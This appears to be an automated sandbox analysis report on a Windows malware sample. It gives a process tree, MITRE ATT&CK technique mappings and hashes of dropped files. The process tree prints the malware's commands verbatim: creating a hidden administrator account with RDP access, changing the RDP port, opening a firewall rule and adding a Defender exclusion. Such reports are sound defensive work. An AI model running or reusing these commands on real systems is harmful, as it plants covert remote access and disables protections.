    Command line: C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\OwDsV.vbs" MENVELaJIp iFxgLSBWge "{7FB22DB6-7827-4FED-A97A-E3C32288467B}"
    - Blocklisted process makes network request
    PID: 2416
  C:\Windows\System32\WScript.exe (depth 2)
    Command line: C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\OwDsV.vbs" MENVELaJIp iFxgLSBWge "{7FB22DB6-7827-4FED-A97A-E3C32288467B}"
    - Blocklisted process makes network request
    PID: 804
  C:\Windows\System32\WScript.exe (depth 2)
    Command line: C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\CLNT.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat"
    PID: 1776
    C:\Windows\System32\cmd.exe (depth 3)
      Command line: "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat
      - Drops file in System32 directory
      PID: 2308
      C:\Windows\system32\cmd.exe (depth 4)
        Command line: C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
        PID: 2948
        C:\Windows\System32\Wbem\WMIC.exe (depth 5)
          Command line: wmic group where sid="S-1-5-32-544" get name /value
          PID: 2932
      C:\Windows\system32\cmd.exe (depth 4)
        Command line: C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
        PID: 2704
        C:\Windows\System32\Wbem\WMIC.exe (depth 5)
          Command line: wmic group where sid="S-1-5-32-555" get name /value
          PID: 2672
      C:\Windows\system32\net.exe (depth 4)
        Command line: net user MENVELaJIp iFxgLSBWge /add
        PID: 2552
        C:\Windows\system32\net1.exe (depth 5)
          Command line: C:\Windows\system32\net1 user MENVELaJIp iFxgLSBWge /add
          PID: 1164
      C:\Windows\system32\net.exe (depth 4)
        Command line: net localgroup Administrators MENVELaJIp /add
        PID: 1848
        C:\Windows\system32\net1.exe (depth 5)
          Command line: C:\Windows\system32\net1 localgroup Administrators MENVELaJIp /add
          PID: 1720
      C:\Windows\system32\net.exe (depth 4)
        Command line: net localgroup Remote Desktop Users MENVELaJIp /add
        PID: 992
        C:\Windows\system32\net1.exe (depth 5)
          Command line: C:\Windows\system32\net1 localgroup Remote Desktop Users MENVELaJIp /add
          PID: 752
      C:\Windows\system32\net.exe (depth 4)
        Command line: net accounts /maxpwage:unlimited
        PID: 324
        C:\Windows\system32\net1.exe (depth 5)
          Command line: C:\Windows\system32\net1 accounts /maxpwage:unlimited
          PID: 288
      C:\Windows\system32\reg.exe (depth 4)
        Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v MENVELaJIp /t REG_DWORD /d "00000000" /f
        - Hide Artifacts: Hidden Users
        PID: 2240
      C:\Windows\system32\reg.exe (depth 4)
        Command line: reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
        PID: 296
      C:\Windows\system32\netsh.exe (depth 4)
        Command line: netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
        - Modifies Windows Firewall
        - Event Triggered Execution: Netsh Helper DLL
        PID: 1644
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4)
        Command line: powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
        - Command and Scripting Interpreter: PowerShell
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        PID: 2500
      C:\Windows\system32\timeout.exe (depth 4)
        Command line: Timeout /t 15
        - Delays execution with timeout.exe
        PID: 2348
Network
MITRE ATT&CK Enterprise v15 (count of matching signatures in parentheses)
Execution
  - Command and Scripting Interpreter (1)
    - PowerShell (1)
  - Scheduled Task/Job (1)
    - Scheduled Task (1)
Persistence
  - Account Manipulation (1)
  - Boot or Logon Autostart Execution (1)
    - Winlogon Helper DLL (1)
  - Create or Modify System Process (1)
    - Windows Service (1)
  - Event Triggered Execution (1)
    - Netsh Helper DLL (1)
  - Scheduled Task/Job (1)
    - Scheduled Task (1)
  - Server Software Component (1)
    - Terminal Services DLL (1)
Privilege Escalation
  - Account Manipulation (1)
  - Boot or Logon Autostart Execution (1)
    - Winlogon Helper DLL (1)
  - Create or Modify System Process (1)
    - Windows Service (1)
  - Event Triggered Execution (1)
    - Netsh Helper DLL (1)
  - Scheduled Task/Job (1)
    - Scheduled Task (1)
Defense Evasion
  - Deobfuscate/Decode Files or Information (1)
  - Hide Artifacts (1)
    - Hidden Users (1)
  - Impair Defenses (1)
    - Disable or Modify System Firewall (1)
  - Modify Registry (1)
Credential Access
  - Credentials from Password Stores (1)
    - Credentials from Web Browsers (1)
  - Unsecured Credentials (1)
    - Credentials In Files (1)
Discovery
  - Password Policy Discovery (1)
  - Permission Groups Discovery (1)
    - Local Groups (1)
  - System Information Discovery (1)
  - System Location Discovery (1)
    - System Language Discovery (1)
Downloads
- Filesize: 12KB
  MD5: b365fde3be7855f4254d1e4bba45d260
  SHA1: b56c6f0402b25c5d68e3a722144f5f4b5bb53d27
  SHA256: 2a175e17c98f9d5f436e23d1c9670f36e54cb82269bccddc87dcfbcfb04d1360
  SHA512: d08e261c0f5c18041d005029cc6ed6119a8cc446607bb5f683a059d1a193d8e04d3e0b52c9f2ea871fcfa8e043c5c2886cfce5419eaf37c39003236f7a399026
- Filesize: 115KB
  MD5: 3b18b58b5b9d32e1e8dc3d4f681227cd
  SHA1: fd328b70f225a372903a3b36567779891f39dc32
  SHA256: 79173702b2b38b8f9ad86ca394f3e8921d01c1aa0c7cfb2f64a760e2f2726cdf
  SHA512: ae15406e7e280ee448edfe35da0d5f84d392ebc5b33d730a9b240bdf3ec4f1a0b0e54c03af226cc3eca04ebffd9416a58d4a917dc537ffb0bd370f20417e10a4
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 342B
  MD5: 21a7571e8fd4e2f681f0d814986fb433
  SHA1: d514853c5dfecac165658159c35780dc3c171bd0
  SHA256: b3fee1668d9622666a61a62033cfee0dd66aabf25ebb930557133b7068624c84
  SHA512: f429512740f1440ef22c7e3b0fc6c4b8d04fc539e3ffc055352ac8a3266a8c7805964737d220eb50648c84a836a5801c2b436a4773335485547388bd9901d11b
- Filesize: 112KB
  MD5: 17567f841e0839a64a23f57f10ecc464
  SHA1: 61d1bdb90dce2493c0d0c8c6fe826fdab2f14bb4
  SHA256: 09fd43e052a13d5624d70c32e921e93bf366682fe7f218c1ec015b892b7b13e5
  SHA512: 746f3f9d78e7bbafa0cadd8a7ed7b8f6a1fac639cc6488fe39f866ab7b34d93c5dda00a02528b3a1ae7b42ab52895740d3309a67898acd449be31121b17e192b
- Filesize: 393KB
  MD5: 4699072b245bd2c2a22b7d08aecdf82d
  SHA1: 08261c8982d46e39b59e685e47df442b42f97f10
  SHA256: 24b5befb7bb4b85ef61f8f86c878f508e5f1716f3de03abe183939c2dd115e8b
  SHA512: a32ed45751392698d20434ab8f849819832e10cd859a929216f8516cd8933cf52813319a7eab703bc45736def5c67f5e974a07b02c7e459a11aadc915b5c336c
- Filesize: 542KB
  MD5: 05151f488f7e6ade25f0b1dc17c0291d
  SHA1: aae7feac5765450eff7c5b1c0d5300c2e1ecef3a
  SHA256: 58ef678cd87678a30de6f8955886c4e92c73253d23e6b3d86ca3786d5fd712f5
  SHA512: eab7bd839c5f1d229cd1b1fa473572df345584483209a7b10f7aaac827e7489eaafd3d5f165ec63172596e7994b7da216027c7bc8cfdccabde8cfe2114aff4fc
- Filesize: 394KB
  MD5: 020ca8399d5809c0d0324133e4b8b1b1
  SHA1: 0ac8b5e0244c45c75daac033da1028b9de551162
  SHA256: a9aa4bfc661a27fd8df576f9f931ce7889e549ac04d3bbef6f7f9408aa14c5c6
  SHA512: 1023e9724fdb2aa00b5ee41c2b537d784cae90dbc761cfd0202e388ceb7272ab98be3bae324cada2ebe739692216f2967d65433486227c950419d0420802fe08
- Filesize: 564KB
  MD5: 7042c42ab11714412914232b8aca6487
  SHA1: fbdbaba75d22e47214312c5357848f00fbd17ea2
  SHA256: 5fb9b33be8bfeefb598d25b9bfdb4c5c1fba0f99bd14d3c2963ab5de183c3a02
  SHA512: fdcaf5242aa1e6b47ccf6b28c3039bc66de6a13c08217fc4e72ab286badd5a1837ac6870f22e700c98143118a4810a08d1d86be8f3f7031e69bc9b5dcb6b1c5d
- Filesize: 410KB
  MD5: 76f84f6090c115e35b4e170f2fb47a9a
  SHA1: 85b23daf1b5a2ad43e54c03f4bd2eec701abd6e2
  SHA256: 8935bdab7e61ec529e2cac9ded1190433d2ec4784bbe2724fd3665d193ddafd4
  SHA512: 86fba86dc7ffbee71c9647289524b06d551492e45ce31bd3cf1b0ef12f8d4e3a7644dc06d3b1ec1583c2238316c4b73fe326d4f6b6042a543d1cd61575038e5f
- Filesize: 872KB
  MD5: c56b5f0201a3b3de53e561fe76912bfd
  SHA1: 2a4062e10a5de813f5688221dbeb3f3ff33eb417
  SHA256: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
  SHA512: 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
- Filesize: 1.8MB
  MD5: 17e2cb0d15de28e402662a9ee7af2b87
  SHA1: 1c10cdcd7c4359aa1b35ec4ce12fd42bedb1a1a9
  SHA256: b0369d44fb6aa6601968f8cc2c5e948495673043334f89256a0ab784f29c5621
  SHA512: 9216342f4bddf0bb8b9a5c8b9523203a0f0c97f07e6327cd688cf55c4a38972b421f1f248f83bbdf256ded9f465a3e82afa537a7c785cc0812ce789651d58444
- Filesize: 577KB
  MD5: 4276f85d94bfc0401a32dd4119d8269b
  SHA1: 28c8b34aa1e02814ea41abe73dc57fb33786a9d6
  SHA256: c11a11e949b86148708d59fbbb5bb0bcdbb6c07b96cd90a028fac5a6a814698b
  SHA512: 7de9a9e003c3f6cb6e824a61963de7962634d8cda54015ffe1c0d46c79e2546e6286a75460d64f540905e1019bd538909e670877e030d2269619fe7edc5dfd0a
- Filesize: 420KB
  MD5: cfe03a0d90005edbb9302a43fe66efae
  SHA1: 0dbc9b31d86eb4f66e96c1d68e72e2553a5a8ffc
  SHA256: bd42c6ee6346e9d78e9d804f739cf04db9284a9b79180b7940bdc60deb1ae5a4
  SHA512: 1788559a23b8b109c0291e7198cd52e2ff13eeaafb0ffe8a8a241ec93f9286faa62fdd1ee237c398084d1629f1bf635055a4648702f39fd6606596156979ec6b
- Filesize: 70KB
  MD5: 49aebf8cbd62d92ac215b2923fb1b9f5
  SHA1: 1723be06719828dda65ad804298d0431f6aff976
  SHA256: b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
  SHA512: bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
- Filesize: 181KB
  MD5: 4ea6026cf93ec6338144661bf1202cd1
  SHA1: a1dec9044f750ad887935a01430bf49322fbdcb7
  SHA256: 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
  SHA512: 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
- Filesize: 2KB
  MD5: e2412243518e6670139e6a1ab6f86a11
  SHA1: b5b55e61279bfea17414d17af75dd6800ffb97c6
  SHA256: ddf634c6f7197af3255caf94af3c986ed7348e7efd508274075cb36254fc8762
  SHA512: 3d0289054ea2355d923da7f6cda0f52015808d73c73910a7145efff80636788dc99c12382ed5f6d25dc299a5be0222deed46a8018c83c6c2852072e4af6e62c6
- Filesize: 1KB
  MD5: 5ff23e46d99aea2886555651887a5f1b
  SHA1: a8dabb15f3834317e1b8ff8b4675dccb672eb55b
  SHA256: 0629895c6da5fb4a09b0832214572c7c6d5058be6f29c3f6061bd0ad428794cf
  SHA512: 5cfd167c876b1be893ec037515c1e36adfe3d78ac51186b262f57499b2acb026d7201debf18c84c66a8f3d98df3558536d99100ab2da442669c2a367d945b5be
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FG22KLT6XWV9V9SXAMTR.temp
  Filesize: 7KB
  MD5: 47bd771c86416c685e98910eac3c88d0
  SHA1: 191e225474381b5cd590b8ca04c32ce0a08bb9d2
  SHA256: 3e3227861f101f7ac35dcc0fc5b1c94ebe7552a84651dd29c13ac49cce7d37b3
  SHA512: 714666c43b438074d412b066654fd44c116b5e679457d6885d66c61883e35f45cbf5cf0734b23b97d16bbf0fb6cb122745291780ef4b52404063c5e7f4e287ce
- Filesize: 4KB
  MD5: 0ce9c2c01d781e4a0fcf2be7c18df9b5
  SHA1: 37a8fe63332b0d96be6855692048f4509f7fdc48
  SHA256: c01364b56cb8008a431239a9a70a041c81b177fa4f0b257fb4a8573110daaf4c
  SHA512: 4cd537ac76ff4c93f84354b21f3dbc2b7e7deea8e695a28363bcf28a2aead439fbabd5ea6a268b115aa7f7ed1c0c17219383af8aaab3dcc39fa4e8d9f075c413
- Filesize: 1KB
  MD5: fd5bdb9de205580a5b1cbbee5a115c93
  SHA1: aca041af337daea9a28292a0bc47ddf65de924a0
  SHA256: 0ba027251fdc179b19f9dafb9514da691256f22468764d33c6c275e3e2f8580f
  SHA512: 0ea8e2d6d7e1a5ff567070ae1173197bbd8ee6fd131e5d5492b9763769995843833fc08c433de5c0018bae626fd4e082e2640610c5c1d8e00163bc5f5bcc711d
- Filesize: 2KB
  MD5: 193242114c1738d0ea04aa93659fdd5a
  SHA1: a929cc1cfbe44ba8a99117dfd7819776ab45d465
  SHA256: c879379224bc8dc4a4f495f989711714a936892b11e7a1cf6e7b79654dc8f928
  SHA512: 46825c3cc42c3c2e86a3890b29b3a2cf9b30e892d0d38bfb2e3334ffa3951b8f732b2786bdffa528ee6ff05c789c35e963f069d54680c3e16735165072e6fec4
- Filesize: 927B
  MD5: 3881787870694df47afe9bb3619f735e
  SHA1: 8acafdeba3ba1e1420ae84447ff02dfe3b187124
  SHA256: 554c290a7739bf67f60f867c51b58472ccb2bf98e78f7300c139b02de0a139a5
  SHA512: 87a32557de46cb4a25091e4aefe8f02c552162d163559d84dcb3c5aeca62a87e9da90614d6c8848951db8b9bc6717bce5af57c53a27cf2168572ea9ed808b55d
- Filesize: 923B
  MD5: 186776970b2ee5ca4352a53b20e2f21c
  SHA1: 2ffeaf1f95748a9d0496c378ac0a40ca15518233
  SHA256: a1d443766374f39776ff191fb86cf802e41091e0f161803a904dfee4bdc00a36
  SHA512: 879761172682aa095a55404e90cde86602342f4b78ae95d3cb1ef81ccac4dd64894d143f3d471110fafed33ea7e9f4dff2343e8201057191c042f3b9a5e0235a
- Filesize: 64KB
  MD5: 80cc04587686785162ff673ba6511483
  SHA1: ac23d39515d2bf17dae5f1ef6ae5505e38f31398
  SHA256: fabc6c6b706a439d1b4f1697891bfd5edf21d59649f35dc868f1e7204cff611b
  SHA512: ae7bf2ac332cc9a3fba6164992cb3b6ee41f2743b1e6d1d9bff405819164d97526970d006e9ae3663bdc7901875d4421115ebde3447ab377fb4085096ac7b8c7
- Filesize: 1KB
  MD5: 9a09d8e6794b47d40c8bf8f91e0cd4b4
  SHA1: f47086004a03a508585c63571beee963e1b4dfb8
  SHA256: 4a6aba17fc23aaa042e71febe17da1955a2eb8550be965fda455601690a4cb15
  SHA512: a61a1a424d9ded322b5313a01c10df1fe431d7ba61cebee64b0c6c79e9a2cf4c19f2ce9475a13ecd16cab8b34c5f6d19c564ca345f3f0d9daa13180722b6bebf
- Filesize: 1KB
  MD5: bb635f66e1adedd1c2c127c348c3dd13
  SHA1: 73939555bca882af7879c045ab15518e8dd634fc
  SHA256: b8afacac814e7c113948b5a7d1f4eaf96e1bf599f04375d604338b2c0f1cee6b
  SHA512: 393d91ef094e89497baab8dcee044f0d775829ca2ad5663032894eb4073ddf71ebf6a8003553df2103f3b56a3330b2595d4a02f170af0ce13252876283772e8e
- Filesize: 1.4MB
  MD5: 3288c284561055044c489567fd630ac2
  SHA1: 11ffeabbe42159e1365aa82463d8690c845ce7b7
  SHA256: ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
  SHA512: c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02
- Filesize: 114KB
  MD5: 461ade40b800ae80a40985594e1ac236
  SHA1: b3892eef846c044a2b0785d54a432b3e93a968c8
  SHA256: 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
  SHA512: 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
- Filesize: 42KB
  MD5: 38bb4505707fdc7e45266cdc81c0544a
  SHA1: 27474c9b0d555ab4f10ee1445a917d4e947a4538
  SHA256: 2520a93fe9530212b2a49e1b131bf7ac273cf6b90950cefa0e60b4c962868dc4
  SHA512: e34ff3fe10593e70e44b131a9a8274994ffd07462e6764d5fcd18e1b6bec89a577783d8f1c3481b5c3a098f8c282c03b282506dd805fe06d7c79644898773159